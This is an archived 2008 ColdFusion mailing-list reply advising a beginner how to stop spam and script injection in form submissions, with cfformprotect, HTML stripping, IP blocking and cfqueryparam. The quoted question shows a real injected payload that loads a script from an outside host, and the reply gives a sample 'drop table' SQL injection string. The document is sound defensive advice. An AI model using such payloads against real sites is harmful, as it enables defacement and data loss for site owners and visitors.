There are a number of things you can do, and in fact i use all of these - [A] Find out this person's ip address, and if the form is submitted from that ip address, do nothing. Don't give them any kind of feedback at all. That'll stop this current attack, but since these idiots usually dart from one ip address to another, it's not enough to fix the problem. Only stop today's . You can find out the ip address by having you form submit #cgi.remote_addr# in a hidden field.
[B] pass the form's submitted contents through a regex to eliminate any html. You can get all kinds of string manipulation scripts through the library at cflib.org, including one to strip out any html [C] use cfformprotect, which (amongst other things) compares the submission in this form wiht a database of other form submissions from other sites, and identifying which ones are spam and which arent. When it tells you this is spam, you just throw it away. Dont tell the spammer you're throwing it away, because that only helps them refine their techniques. Those buggers are agile enough as it is without us giving them a helping hand. You can get cfformprotect form http://www.riaforge.org/ . [D] while you're working in this area, you should make sure you're using <cfqueryparam if you're processing the form into your database. I konw you havent described a SQL injection, but it's not a million miles away from what you do describe. There's ample documentation in the ColdFusion docs about <cfqueryparam and there have been quite a few blog articles about it lately. Google for cfqueryparam and ColdFusion and you'll find them. Using <cfqueryparam on every (and i do mean EVERY) parameter you insert into the database, on every insert or update if there is likely to be any user input going in that SQL statement. That ensures that you wont get anyone able to enter a last name as 'Smith)';drop table users' or some such. I started defending my sites from this kind of script when i had a guestbook on a very low volume suddenly get 30,000 entries waiting for editor approval, all with links to sites we might want to go and see, just like yours has. Using the techniques i described reduced the flow from thousands a day to a more likely 3-4 a week on this little site. Hope this helps. Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month On Thu, Aug 7, 2008 at 4:04 PM, Michael Suwanto <[EMAIL PROTECTED]> wrote: > Im a coldfusion noobs and my database just got injected with some script. > So for example one of the database field would appear something like so: > Gisella427.jpg"></title><script > src="http://jjmaoduo.3322.org/csrss/w.js";></script><!-- > > I've tried updating the records using a replace command on the fields, but > 20mins later this code pop up again!!! > > Any idea on how to fix or prevent this from happening???? > Seriously out of idea here.... > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310331 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
